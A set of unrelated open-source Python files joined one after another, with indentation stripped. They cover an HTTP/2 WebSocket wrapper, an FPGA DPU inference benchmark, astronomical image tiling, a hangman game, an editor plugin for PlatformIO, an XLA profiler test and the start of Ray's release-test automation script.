:param request_handler: A H2HandlerCopy instance.
:param response: A H2Response instance.
"""
self.connection = _WebSocketConnection(request_handler, response)
self.protocol = "HTTP/2"
self._response = response
self.uri = request_handler.path
self.unparsed_uri = request_handler.path
self.method = request_handler.command
# read headers from request_handler
self.headers_in = request_handler.headers
# write headers directly into H2Response
self.headers_out = response.headers
# proxies status to H2Response
@property
def status(self):
return self._response.status
@status.setter
def status(self, status):
self._response.status = status
|
app_mt.py | '''
Copyright 2020 Xilinx Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from ctypes import *
import cv2
import numpy as np
import runner
import os
import xir
import pathlib
import vart
import threading
import time
import sys
import argparse
def preprocess_fn(image_path):
'''
Image pre-processing.
Rearranges from BGR to RGB then normalizes to range 0:1
input arg: path of image file
return: numpy array
'''
image = cv2.imread(image_path)
#image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = cv2.resize(image,(224,224),interpolation=cv2.INTER_CUBIC)
image = image/255.0
return image
def get_subgraph (g):
sub = []
root = g.get_root_subgraph()
sub = [ s for s in root.toposort_child_subgraph()
if s.has_attr("device") and s.get_attr("device").upper() == "DPU"]
return sub
def runDPU(id,start,dpu,img):
'''get tensor'''
inputTensors = dpu.get_input_tensors()
outputTensors = dpu.get_output_tensors()
shapeIn = tuple(inputTensors[0].dims)
shapeOut = tuple(outputTensors[0].dims)
batchSize = shapeIn[0]
n_of_images = len(img)
count = 0
write_index = start
while count < n_of_images:
if (count+batchSize<=n_of_images):
runSize = batchSize
else:
runSize=n_of_images-count
'''prepare batch input/output '''
outputData = []
inputData = []
outputData = [np.empty(shapeOut, dtype = np.float32, order = 'C')]
inputData = [np.empty(shapeIn, dtype = np.float32, order = 'C')]
'''init input image to input buffer '''
for j in range(runSize):
imageRun = inputData[0]
imageRun[j, ...] = img[(count+j)% n_of_images].reshape(shapeIn[1:])
'''run with batch '''
job_id = dpu.execute_async(inputData,outputData)
dpu.wait(job_id)
'''store output vectors '''
for j in range(runSize):
out_q[write_index] = outputData[0][j]
write_index += 1
count = count + runSize
def app(image_dir,threads,model):
listimage=os.listdir(image_dir)
runTotal = len(listimage)
runTotal = min(500,runTotal)
global out_q
out_q = [None] * runTotal
g = xir.Graph.deserialize(model)
#g = xir.Graph.deserialize('model_dir/dobble.xmodel')
subgraphs = get_subgraph (g)
assert len(subgraphs) == 1 # only one DPU kernel
all_dpu_runners = []
for i in range(threads):
all_dpu_runners.append(runner.Runner(subgraphs[0], "run"))
''' preprocess images '''
print('Pre-processing',runTotal,'images...')
img = []
for i in range(runTotal):
path = os.path.join(image_dir,listimage[i])
#print(i,"/",runTotal,"=",path)
img.append(preprocess_fn(path))
'''run threads '''
print('Starting',threads,'threads...')
threadAll = []
start=0
for i in range(threads):
if (i==threads-1):
end = len(img)
else:
end = start+(len(img)//threads)
in_q = img[start:end]
t1 = threading.Thread(target=runDPU, args=(i,start,all_dpu_runners[i], in_q))
threadAll.append(t1)
start=end
time1 = time.time()
for x in threadAll:
x.start()
for x in threadAll:
x.join()
time2 = time.time()
timetotal = time2 - time1
fps = float(runTotal / timetotal)
print("FPS=%.2f, total frames = %.0f , time=%.4f seconds" %(fps,runTotal, timetotal))
''' post-processing '''
#classes = ['airplane','automobile','bird','cat','deer','dog','frog','horse','ship','truck']
correct = 0
wrong = 0
print('output buffer length:',len(out_q))
for i in range(len(out_q)):
argmax = np.argmax((out_q[i]))
#prediction = classes[argmax]
prediction = argmax
#ground_truth, _ = listimage[i].split('_')
path_split = listimage[i].split('_')
card = path_split[len(path_split)-2]
ground_truth = int( card[4:] )
#print(path_split,card,ground_truth)
#print(card,ground_truth,prediction)
if (ground_truth==prediction):
correct += 1
else:
wrong += 1
#print("[ERROR] ",listimage[i]," detected as ",prediction)
accuracy = correct/len(out_q)
print('Correct:',correct,'Wrong:',wrong,'Accuracy:', accuracy)
# only used if script is run as 'main' from command line
def main():
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument('-d', '--image_dir',
type=str,
default='images',
help='Path to folder of images. Default is images')
ap.add_argument('-t', '--threads',
type=int,
default=1,
help='Number of threads. Default is 1')
ap.add_argument('-m', '--model',
type=str,
default='model_dir/dobble.xmodel',
help='Path of .elf. Default is model_dir/dobble.xmodel')
args = ap.parse_args()
print ('Command line options:')
print (' --image_dir : ', args.image_dir)
print (' --threads : ', args.threads)
print (' --model : ', args.model)
app(args.image_dir,args.threads,args.model)
if __name__ == '__main__':
main()
|
multi_wcs.py | # -*- mode: python; coding: utf-8 -*-
# Copyright 2020-2021 the AAS WorldWide Telescope project
# Licensed under the MIT License.
"""
Generate tiles from a collection of images with associated WCS coordinate
systems.
This module has the following Python package dependencies:
- astropy
- reproject
- shapely (to optimize the projection in reproject)
"""
__all__ = '''
MultiWcsProcessor
'''.split()
import numpy as np
from tqdm import tqdm
import warnings
from .image import Image, ImageDescription, ImageMode
from .study import StudyTiling
class MultiWcsDescriptor(object):
ident = None
in_shape = None
in_wcs = None
imin = None
imax = None
jmin = None
jmax = None
sub_tiling = None
class MultiWcsProcessor(object):
def __init__(self, collection):
self._collection = collection
def compute_global_pixelization(self, builder):
from reproject.mosaicking.wcs_helpers import find_optimal_celestial_wcs
# Load up current WCS information for all of the inputs
def create_mwcs_descriptor(coll_desc):
desc = MultiWcsDescriptor()
desc.ident = coll_desc.collection_id
desc.in_shape = coll_desc.shape
desc.in_wcs = coll_desc.wcs
return desc
self._descs = [create_mwcs_descriptor(d) for d in self._collection.descriptions()]
# Compute the optimal tangential tiling that fits all of them. Since WWT
# tilings must be done in a negative-parity coordinate system, we use an
# ImageDescription helper to ensure we get that.
wcs, shape = find_optimal_celestial_wcs(
((desc.in_shape, desc.in_wcs) for desc in self._descs),
auto_rotate = True,
projection = 'TAN',
)
desc = ImageDescription(wcs=wcs, shape=shape)
desc.ensure_negative_parity()
self._combined_wcs = desc.wcs
self._combined_shape = desc.shape
height, width = self._combined_shape
self._tiling = StudyTiling(width, height)
self._tiling.apply_to_imageset(builder.imgset)
builder.apply_wcs_info(self._combined_wcs, width, height)
# While we're here, figure out how each input will map onto the global
# tiling. This makes sure that nothing funky happened during the
# computation and allows us to know how many tiles we'll have to visit.
self._n_todo = 0
for desc in self._descs:
# XXX: this functionality is largely copied from
# `reproject.mosaicking.coadd.reproject_and_coadd`, and redundant
# with it, but it's sufficiently different that I think the best
# approach is to essentially fork the implementation.
# Figure out where this array lands in the mosaic.
ny, nx = desc.in_shape
xc = np.array([-0.5, nx - 0.5, nx - 0.5, -0.5])
yc = np.array([-0.5, -0.5, ny - 0.5, ny - 0.5])
xc_out, yc_out = self._combined_wcs.world_to_pixel(desc.in_wcs.pixel_to_world(xc, yc))
if np.any(np.isnan(xc_out)) or np.any(np.isnan(yc_out)):
raise Exception(f'segment {desc.ident} does not fit within the global mosaic')
desc.imin = max(0, int(np.floor(xc_out.min() + 0.5)))
desc.imax = min(self._combined_shape[1], int(np.ceil(xc_out.max() + 0.5)))
desc.jmin = max(0, int(np.floor(yc_out.min() + 0.5)))
desc.jmax = min(self._combined_shape[0], int(np.ceil(yc_out.max() + 0.5)))
# Compute the sub-tiling now so that we can count how many total
# tiles we'll need to process.
if desc.imax < desc.imin or desc.jmax < desc.jmin:
raise Exception(f'segment {desc.ident} maps to zero size in the global mosaic')
desc.sub_tiling = self._tiling.compute_for_subimage(
desc.imin,
desc.jmin,
desc.imax - desc.imin,
desc.jmax - desc.jmin,
)
self._n_todo += desc.sub_tiling.count_populated_positions()
return self # chaining convenience
def tile(self, pio, reproject_function, parallel=None, cli_progress=False, **kwargs):
"""
Tile!!!!
Parameters
----------
pio : :class:`toasty.pyramid.PyramidIO`
A :class:`~toasty.pyramid.PyramidIO` instance to manage the I/O with
the tiles in the tile pyramid.
reproject_function : TKTK
TKTK
parallel : integer or None (the default)
The level of parallelization to use. If unspecified, defaults to using
all CPUs. If the OS does not support fork-based multiprocessing,
parallel processing is not possible and serial processing will be
forced. Pass ``1`` to force serial processing.
cli_progress : optional boolean, defaults False
If true, a progress bar will be printed to the terminal using tqdm.
"""
from .par_util import resolve_parallelism
parallel = resolve_parallelism(parallel)
if parallel > 1:
self._tile_parallel(pio, reproject_function, cli_progress, parallel, **kwargs)
else:
self._tile_serial(pio, reproject_function, cli_progress, **kwargs)
# Since we used `pio.update_image()`, we should clean up the lockfiles
# that were generated.
pio.clean_lockfiles(self._tiling._tile_levels)
def _tile_serial(self, pio, reproject_function, cli_progress, **kwargs):
invert_into_tiles = pio.get_default_vertical_parity_sign() == 1
with tqdm(total=self._n_todo, disable=not cli_progress) as progress:
for image, desc in zip(self._collection.images(), self._descs):
# XXX: more copying from
# `reproject.mosaicking.coadd.reproject_and_coadd`.
wcs_out_indiv = self._combined_wcs[desc.jmin:desc.jmax, desc.imin:desc.imax]
shape_out_indiv = (desc.jmax - desc.jmin, desc.imax - desc.imin)
array = reproject_function(
(image.asarray(), image.wcs),
output_projection=wcs_out_indiv,
shape_out=shape_out_indiv,
return_footprint=False,
**kwargs
)
image = Image.from_array(array.astype(np.float32))
for pos, width, height, image_x, image_y, tile_x, tile_y in desc.sub_tiling.generate_populated_positions():
# Because we are doing an arbitrary WCS reprojection anyway,
# we can ensure that our source image is stored with a
# top-down vertical data layout, AKA negative image parity,
# which is what the overall "study" coordinate system needs.
# But if we're writing to FITS format tiles, those need to
# end up with a bottoms-up format. So we need to flip the
# vertical orientation of how we put the data into the tile
# buffer.
if invert_into_tiles:
flip_tile_y1 = 255 - tile_y
flip_tile_y0 = flip_tile_y1 - height
if flip_tile_y0 == -1:
flip_tile_y0 = None # with a slice, -1 does the wrong thing
by_idx = slice(flip_tile_y1, flip_tile_y0, -1)
else:
by_idx = slice(tile_y, tile_y + height)
iy_idx = slice(image_y, image_y + height)
ix_idx = slice(image_x, image_x + width)
bx_idx = slice(tile_x, tile_x + width)
with pio.update_image(pos, masked_mode=image.mode, default='masked') as basis:
image.update_into_maskable_buffer(basis, iy_idx, ix_idx, by_idx, bx_idx)
progress.update(1)
if cli_progress:
print()
def _tile_parallel(self, pio, reproject_function, cli_progress, parallel, **kwargs):
import multiprocessing as mp
# Start up the workers
queue = mp.Queue(maxsize = 2 * parallel)
workers = []
for _ in range(parallel):
w = mp.Process(target=_mp_tile_worker, args=(queue, pio, reproject_function, kwargs))
w.daemon = True
w.start()
workers.append(w)
# Send out them segments
with tqdm(total=len(self._descs), disable=not cli_progress) as progress:
for image, desc in zip(self._collection.images(), self._descs):
wcs_out_indiv = self._combined_wcs[desc.jmin:desc.jmax, desc.imin:desc.imax]
queue.put((image, desc, wcs_out_indiv))
progress.update(1)
queue.close()
for w in workers:
w.join()
if cli_progress:
print()
def _mp_tile_worker(queue, pio, reproject_function, kwargs):
"""
Generate and enqueue the tiles that need to be processed.
"""
from queue import Empty
invert_into_tiles = pio.get_default_vertical_parity_sign() == 1
while True:
try:
# un-pickling WCS objects always triggers warnings right now
with warnings.catch_warnings():
warnings.simplefilter('ignore')
image, desc, wcs_out_indiv = queue.get(True, timeout=1)
except (OSError, ValueError, Empty):
# OSError or ValueError => queue closed. This signal seems not to
# cross multiprocess lines, though.
break
shape_out_indiv = (desc.jmax - desc.jmin, desc.imax - desc.imin)
array = reproject_function(
(image.asarray(), image.wcs),
output_projection=wcs_out_indiv,
shape_out=shape_out_indiv,
return_footprint=False,
**kwargs
)
image = Image.from_array(array.astype(np.float32))
for pos, width, height, image_x, image_y, tile_x, tile_y in desc.sub_tiling.generate_populated_positions():
if invert_into_tiles:
flip_tile_y1 = 255 - tile_y
flip_tile_y0 = flip_tile_y1 - height
if flip_tile_y0 == -1:
flip_tile_y0 = None # with a slice, -1 does the wrong thing
by_idx = slice(flip_tile_y1, flip_tile_y0, -1)
else:
by_idx = slice(tile_y, tile_y + height)
iy_idx = slice(image_y, image_y + height)
ix_idx = slice(image_x, image_x + width)
bx_idx = slice(tile_x, tile_x + width)
with pio.update_image(pos, masked_mode=image.mode, default='masked') as basis:
image.update_into_maskable_buffer(basis, iy_idx, ix_idx, by_idx, bx_idx)
|
hangman.py | import random
from bs4 import BeautifulSoup
import urllib.request
import requests
def display_hangman(tries):
stages = [
"""
--------
| |
| O
| \\|/
| |
| / \\
-
""",
"""
--------
| |
| O
| \\|/
| |
| /
-
""",
"""
--------
| |
| O
| \\|/
| |
|
-
""",
"""
--------
| |
| O
| \\|
| |
|
-
""",
"""
--------
| |
| O
| |
| |
|
-
""",
"""
--------
| |
| O
|
|
|
-
""",
"""
--------
| |
|
|
|
|
-
"""
]
return stages[tries]
def hangman(tally):
words=['malayalam','tomato','pumpkin','moon','goat']
x=random.randint(0,len(words)-1)
a=random.choice(words)
#a=a.decode('utf-8')
a=a.lower()
b=str()
print('Your word is: ', end= ' ')
for i in range (0, len(a)):
b= b+'_'
print(b[i] ,end= ' ')
guess=[]
wrong=[]
points=tally[1]
tries=tally[0]
while(tries>0):
print("\nYour guesses so far:",guess)
print('\n\nYou have ' +str(tries)+' chances to guess the word')
x=input("Enter 0 to stop this game or Enter an alphabet: ")
if(x=='0'):
break
if(len(x)!=1):
print("Enter only a single alphabet")
continue
if(x.isalpha()==False):
print("Enter a valid alphabet")
continue
x= x.lower()
guess.append(x)
buffer=0
buffer1=0
found=0
for i in range (0,len(a)):
if(a[i]==x):
found=1
buffer=1
b=list(b)
b[i]=x
b="".join(b)
points=points+1
if(buffer==1):
print("Correct guess :)")
for j in range (0, len(b)):
print(b[j] ,end= ' ')
if(found==0):
print("Incorrect guess, try harder!!")
for j in range (0, len(b)):
print(b[j] ,end= ' ')
if(buffer==0):
if x in wrong:
buffer1=1
if(buffer1==0):
print(display_hangman(tries-1))
tries=tries-1
wrong.append(x)
buf=0
for i in range(0, len(b)):
if(b[i]=='_'):
buf=1
if(buf==0):
print('\nYou have guessed the word with ' + str(tries) +' chances left \n'+ str(points)+' points\n\n')
tally[0]=tries
tally[1]=points
return tally
if(tries==0):
print('You lost. Better luck next time! \n Your word was: '+a+'\nYour points are: '+str(points))
print(a)
tally[0]=0
tally[1]=points
return tally
print('HANGMAN')
tally=[0,0]
while True:
x=input('Press:\n 1.To play a new game \n 2. Continue existing game \n 3. Exit\n')
if(x=='1'):
tally=[7,0]
tally= hangman(tally)
elif(x=='2'):
if(tally[0]==0):
print('There is no saved game, here is a new one\n')
tally[0]=7
tally[1]=0
tally=hangman(tally)
elif(x=='3'):
exit()
else:
print("Enter a valid response ")
import time
import threading
t = threading.Thread(target=hangman)
t.daemon = True
t.start()
time.sleep(6)
|
initialize.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
from ..api import deviot
from ..libraries.project_check import ProjectCheck
from ..libraries.tools import save_sysetting, get_setting
from ..libraries.messages import Messages
class Initialize(ProjectCheck):
"""
Runs the init command to start working with a new board
Initialize a new folder you need to know the board id
and pass it as an argument in the class
Initialize(board_id)
The code will run in a new thread to avoid block the
execution of the sublime text while platformio is working
"""
def __init__(self):
super(Initialize, self).__init__()
self.init_option = None
messages = Messages()
messages.initial_text('_deviot_starting{0}', deviot.version())
messages.create_panel()
self.init(messages=messages)
self.print = messages.print
def add_board(self):
"""New Board
Adds a new board to the environments of platformio
this new board will be stored in the platformio.ini
file and will be use with the plugin
Arguments:
board_id {str} -- name of the board to initialize
Returns:
bool -- true if the board was succefully intilized or if it
was already initialized, if there was an error, false
"""
self.check_board_selected()
if(not self.board_id):
return
envs = self.get_envs_initialized()
if(envs and self.board_id in envs):
return True
cmd = ['init', '-b ', self.board_id]
self.run_command(cmd)
self.structurize_project()
def nonblock_add_board(self):
"""New Thread Execution
Starts a new thread to run the add_board method
Arguments:
board_id {str} -- id_of the board to initialize
"""
from threading import Thread
thread = Thread(target=self.add_board)
thread.start()
def after_complete(self):
"""At complete
This method will run functions after complete a compilation
or upload an sketch. You should only put here a fuction or
a method
"""
pio_untouch = get_setting('pio_untouch', False)
if(pio_untouch):
# remove lib_extra_dirs option
self.add_option('lib_extra_dirs', wipe=True)
# remove programmer flags
self.programmer(wipe=True)
# remove upload_speed
self.add_option('upload_speed', wipe=True)
# none last action
save_sysetting('last_action', None)
|
test_xla_profiler.py | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from multiprocessing import Event, Process
import pytest
from pytorch_lightning import Trainer
from pytorch_lightning.profiler import XLAProfiler
from pytorch_lightning.utilities import _TORCH_GREATER_EQUAL_1_8, _TPU_AVAILABLE
from tests.helpers import BoringModel
from tests.helpers.runif import RunIf
if _TPU_AVAILABLE:
import torch_xla.utils.utils as xu
if _TORCH_GREATER_EQUAL_1_8:
import torch_xla.debug.profiler as xp
@RunIf(tpu=True)
def test_xla_profiler_instance(tmpdir):
model = BoringModel()
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True, profiler="xla", accelerator="tpu", devices=8)
assert isinstance(trainer.profiler, XLAProfiler)
trainer.fit(model)
assert trainer.state.finished, f"Training failed with {trainer.state}"
@pytest.mark.skipif(True, reason="XLA Profiler doesn't support Prog. capture yet")
def test_xla_profiler_prog_capture(tmpdir):
port = xu.get_free_tcp_ports()[0]
training_started = Event()
def train_worker():
model = BoringModel()
trainer = Trainer(default_root_dir=tmpdir, max_epochs=4, profiler="xla", accelerator="tpu", devices=8)
trainer.fit(model)
p = Process(target=train_worker, daemon=True)
p.start()
training_started.wait(120)
logdir = str(tmpdir)
xp.trace(f"localhost:{port}", logdir, duration_ms=2000, num_tracing_attempts=5, delay_ms=1000)
p.terminate()
assert os.isfile(os.path.join(logdir, "plugins", "profile", "*", "*.xplane.pb"))
|
e2e.py | """
This is an end to end release test automation script used to kick off periodic
release tests, running on Anyscale.
The tool leverages app configs and compute templates.
Calling this script will run a single release test.
Example:
python e2e.py --test-config ~/ray/release/xgboost_tests/xgboost_tests.yaml --test-name tune_small
The following steps are then performed:
1. It will look up the test tune_small in the file xgboost_tests.yaml
2. It will fetch the specified app config and compute template and register
those with anyscale (if they don’t exist yet)
3. It waits until the app config is built
4. It then kicks off the script defined in the run block
5. When the script is finished, it will fetch the latest logs, the full log
output, and any artifacts specified in the artifacts block.
6. The full logs and artifacts will be stored in a s3 bucket
7. It will also fetch the json file specified in the run block as results.
This is the file where you should write your metrics to.
8. All results are then stored in a database.
Specifically it will store the following fields:
- Timestamp
- Test name
- Status (finished, error, timeout, invalid)
- Last logs (50 lines)
- results (see above)
- artifacts (links to s3 files)
Then the script exits. If an error occurs at any time, a fail result is
written to the database.
Writing a new release test
--------------------------
Each release test requires the following:
1. It has to be added in a release test yaml file, describing meta information
about the test (e.g. name, command to run, timeout)
2. You need an app config yaml
3. You need a compute template yaml
4. You need to define a command to run. This is usually a python script.
The command should accept (or ignore) a single optional
`--smoke-test` argument.
Usually the command should write its result metrics to a json file.
The json filename is available in the TEST_OUTPUT_JSON env variable.
5. Add your test in release/.buildkite/build_pipeline.py.
The script will have access to these environment variables:
"RAY_ADDRESS": os.environ.get("RAY_ADDRESS", "auto")
"TEST_OUTPUT_JSON": results_json_filename
"IS_SMOKE_TEST": "1" if smoke_test else "0"
For an example, take a look at the XGBoost test suite:
https://github.com/ray-project/ray/blob/master/release/xgboost_tests/xgboost_tests.yaml
These all use the same app configs and similar compute templates. This means
that app configs can be re-used across runs and only have to be built ones.
App configs and compute templates can interpret environment variables.
A notable one is the `RAY_WHEELS` variable which points to the wheels that
should be tested (e.g. latest master wheels). You might want to include
something like this in your `post_build_cmds`:
- pip3 install -U {{ env["RAY_WHEELS"] | default("ray") }}
If you want to force rebuilds, consider using something like
- echo {{ env["TIMESTAMP"] }}
so that your app configs changes each time the script is executed. If you
only want to trigger rebuilds once per day, use `DATESTAMP` instead:
- echo {{ env["DATESTAMP"] }}
Local testing
-------------
For local testing, make sure to authenticate with the ray-ossci AWS user
(e.g. by setting the respective environment variables obtained from go/aws),
or use the `--no-report` command line argument.
Also make sure to set these environment variables:
- ANYSCALE_CLI_TOKEN (should contain your anyscale credential token)
- ANYSCALE_PROJECT (should point to a project ID you have access to)
A test can then be run like this:
python e2e.py --no-report --test-config ~/ray/release/xgboost_tests/xgboost_tests.yaml --test-name tune_small
The `--no-report` option disables storing the results in the DB and
artifacts on S3. If you set this option, you do not need access to the
ray-ossci AWS user.
Using Compilation on Product + App Config Override
--------------------------------------------------
For quick iteration when debugging a release test, go/compile-on-product allows
you to easily modify and recompile Ray, such that the recompilation happens
within an app build step and can benefit from a warm Bazel cache. See
go/compile-on-product for more information.
After kicking off the app build, you can give the app config ID to this script
as an app config override, where the indicated app config will be used instead
of the app config given in the test config. E.g., running
python e2e.py --no-report --test-config ~/ray/benchmarks/benchmark_tests.yaml --test-name=single_node --app-config-id-override=apt_TBngEXXXrhipMXgexVcrpC9i
would run the single_node benchmark test with the apt_TBngEXXXrhipMXgexVcrpC9i
app config instead of the app config given in
~/ray/benchmarks/benchmark_tests.yaml. If the build for the app config is still
in progress, the script will wait until it completes, same as for a locally
defined app config.
Running on Head Node vs Running with Anyscale Connect
-----------------------------------------------------
By default release tests run their drivers on the head node. Support is being
added to run release tests that execute the driver as a subprocess and run
the workload on Anyscale product via Anyscale connect.
Note that when the driver in the test is a subprocess of releaser, releaser
cannot be terminated before the test finishes.
Other known feature gaps when running with Anyscale connect:
- Kicking off a test or checking progress is not supported.
- Downloading / uploading logs and artifacts are unsupported.
- Logs from remote may not have finished streaming, before the driver exits.
Long running tests
------------------
Long running tests can be kicked off with by adding the --kick-off-only
parameters to the e2e script. The status can then be checked with the
--check command.
Long running test sessions will be terminated after `timeout` seconds, after
which the latest result in the TEST_OUTPUT_JSON will be reported. Thus,
long running release tests should update this file periodically.
There are also two config options to configure behavior. The `time_key` is
needed to track the latest update of the TEST_OUTPUT_JSON and should contain
a floating point number (usually `time.time()`). The `max_update_delay` then
specified the maximum time in seconds that can be passed without an update
to the results json. If the output file hasn't been updated in e.g. 60 seconds,
this could indicate that the command is stale/frozen, and thus should fail.
Release test yaml example
-------------------------
- name: example
owner:
mail: "kai@anyscale.com" # Currently not used
slack: "@tune-team" # Currentl not used
cluster:
app_config: app_config.yaml # Relative to the release test yaml
compute_template: tpl_cpu.yaml
run:
timeout: 600 # in seconds
prepare: python wait_cluster.py 4 600 # prepare cmd to run before test
script: python workloads/train.py # actual release test command
# Only needed for long running test
time_key: last_update # Key in the results json indicating current time
max_update_delay: 30 # If state hasn't been updated in 30s, terminate
# This block is optional
artifacts:
# Artifact name: location on head node
- detailed_output: detailed_output.csv
# This block is optional. If present, the contents will be
# deep updated for smoke testing
smoke_test:
cluster:
compute_template: tpl_cpu_smoketest.yaml
""" # noqa: E501
import argparse
import boto3
import collections
import copy
import datetime
import hashlib
import jinja2
import json
import logging
import multiprocessing
import os
import requests
import shutil
import subprocess
import sys
import tempfile
import time
from queue import Empty
from typing import Any, Dict, Optional, Tuple, List
import yaml
import anyscale
import anyscale.conf
from anyscale.api import instantiate_api_client
from anyscale.controllers.session_controller import SessionController
from anyscale.sdk.anyscale_client.sdk import AnyscaleSDK
logger = logging.getLogger()
logger.setLevel(logging.INFO)
handler = logging.StreamHandler(stream=sys.stdout)
formatter = logging.Formatter(fmt="[%(levelname)s %(asctime)s] "
"%(filename)s: %(lineno)d "
"%(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
def getenv_default(key: str, default: Optional[str] = None):
"""Return environment variable with default value"""
# If the environment variable is set but "", still return default
return os.environ.get(key, None) or default
GLOBAL_CONFIG = {
"ANYSCALE_USER": getenv_default("ANYSCALE_USER",
"release-automation@anyscale.com"),
"ANYSCALE_HOST": getenv_default("ANYSCALE_HOST",
"https://beta.anyscale.com"),
"ANYSCALE_CLI_TOKEN": getenv_default("ANYSCALE_CLI_TOKEN"),
"ANYSCALE_CLOUD_ID": getenv_default(
"ANYSCALE_CLOUD_ID",
"cld_4F7k8814aZzGG8TNUGPKnc"), # cld_4F7k8814aZzGG8TNUGPKnc
"ANYSCALE_PROJECT": getenv_default("ANYSCALE_PROJECT", ""),
"RAY_VERSION": getenv_default("RAY_VERSION", "2.0.0.dev0"),
"RAY_REPO": getenv_default("RAY_REPO",
"https://github.com/ray-project/ray.git"),
"RAY_BRANCH": getenv_default("RAY_BRANCH", "master"),
"RELEASE_AWS_BUCKET": getenv_default("RELEASE_AWS_BUCKET",
"ray-release-automation-results"),
"RELEASE_AWS_LOCATION": getenv_default("RELEASE_AWS_LOCATION", "dev"),
"RELEASE_AWS_DB_NAME": getenv_default("RELEASE_AWS_DB_NAME", "ray_ci"),
"RELEASE_AWS_DB_TABLE": getenv_default("RELEASE_AWS_DB_TABLE",
"release_test_result"),
"RELEASE_AWS_DB_SECRET_ARN": getenv_default(
"RELEASE_AWS_DB_SECRET_ARN",
"arn:aws:secretsmanager:us-west-2:029272617770:secret:"
"rds-db-credentials/cluster-7RB7EYTTBK2EUC3MMTONYRBJLE/ray_ci-MQN2hh",
),
"RELEASE_AWS_DB_RESOURCE_ARN": getenv_default(
"RELEASE_AWS_DB_RESOURCE_ARN",
"arn:aws:rds:us-west-2:029272617770:cluster:ci-reporting",
),
"DATESTAMP": str(datetime.datetime.now().strftime("%Y%m%d")),
"TIMESTAMP": str(int(datetime.datetime.now().timestamp())),
"EXPIRATION_1D": str((datetime.datetime.now() +
datetime.timedelta(days=1)).strftime("%Y-%m-%d")),
"EXPIRATION_2D": str((datetime.datetime.now() +
datetime.timedelta(days=2)).strftime("%Y-%m-%d")),
"EXPIRATION_3D": str((datetime.datetime.now() +
datetime.timedelta(days=3)).strftime("%Y-%m-%d")),
}
REPORT_S = 30
def maybe_fetch_api_token():
if GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"] is None:
print("Missing ANYSCALE_CLI_TOKEN, retrieving from AWS secrets store")
# NOTE(simon) This should automatically retrieve
# release-automation@anyscale.com's anyscale token
GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"] = boto3.client(
"secretsmanager", region_name="us-west-2"
).get_secret_value(
SecretId="arn:aws:secretsmanager:us-west-2:029272617770:secret:"
"release-automation/"
"anyscale-token20210505220406333800000001-BcUuKB")["SecretString"]
class PrepareCommandRuntimeError(RuntimeError):
pass
class ReleaseTestTimeoutError(RuntimeError):
pass
class SessionTimeoutError(ReleaseTestTimeoutError):
pass
class FileSyncTimeoutError(ReleaseTestTimeoutError):
pass
class CommandTimeoutError(ReleaseTestTimeoutError):
pass
class PrepareCommandTimeoutError(ReleaseTestTimeoutError):
pass
class State:
def __init__(self, state: str, timestamp: float, data: Any):
self.state = state
self.timestamp = timestamp
self.data = data
sys.path.insert(0, anyscale.ANYSCALE_RAY_DIR)
def anyscale_project_url(project_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/projects/{project_id}" \
f"/?tab=session-list"
def anyscale_session_url(project_id: str, session_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/projects/{project_id}" \
f"/clusters/{session_id}"
def anyscale_compute_tpl_url(compute_tpl_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/configurations/cluster-computes" \
f"/{compute_tpl_id}"
def anyscale_app_config_build_url(build_id: str):
return f"{GLOBAL_CONFIG['ANYSCALE_HOST']}" \
f"/o/anyscale-internal/configurations/app-config-details" \
f"/{build_id}"
def wheel_url(ray_version, git_branch, git_commit):
return f"https://s3-us-west-2.amazonaws.com/ray-wheels/" \
f"{git_branch}/{git_commit}/" \
f"ray-{ray_version}-cp37-cp37m-manylinux2014_x86_64.whl"
def wheel_exists(ray_version, git_branch, git_commit):
url = wheel_url(ray_version, git_branch, git_commit)
return requests.head(url).status_code == 200
def get_latest_commits(repo: str, branch: str = "master") -> List[str]:
cur = os.getcwd()
with tempfile.TemporaryDirectory() as tmpdir:
os.chdir(tmpdir)
clone_cmd = [
"git",
"clone",
"--filter=tree:0",
"--no-checkout",
# "--single-branch",
# "--depth=10",
f"--branch={branch}",
repo,
tmpdir,
]
log_cmd = [
"git",
"log",
"-n",
"10",
"--pretty=format:%H",
]
subprocess.check_output(clone_cmd)
commits = subprocess.check_output(log_cmd).decode(
sys.stdout.encoding).split("\n")
os.chdir(cur)
return commits
def find_ray_wheels(repo: str, branch: str, version: str):
url = None
commits = get_latest_commits(repo, branch)
logger.info(f"Latest 10 commits for branch {branch}: {commits}")
for commit in commits:
if wheel_exists(version, branch, commit):
url = wheel_url(version, branch, commit)
os.environ["RAY_WHEELS"] = url
os.environ["RAY_COMMIT"] = commit
logger.info(
f"Found wheels URL for Ray {version}, branch {branch}: "
f"{url}")
break
return url
def populate_wheels_sanity_check(commit: Optional[str] = None):
if not commit:
raise RuntimeError(f"Could not populate wheels sanity check command: "
f"Commit hash missing. Got: {commit}")
cmd = f"python -c 'import ray; assert ray.__commit__ == \"{commit}\"'"
os.environ["RAY_WHEELS_SANITY_CHECK"] = cmd
def _check_stop(stop_event: multiprocessing.Event, timeout_type: str):
if stop_event.is_set():
if timeout_type == "prepare_command":
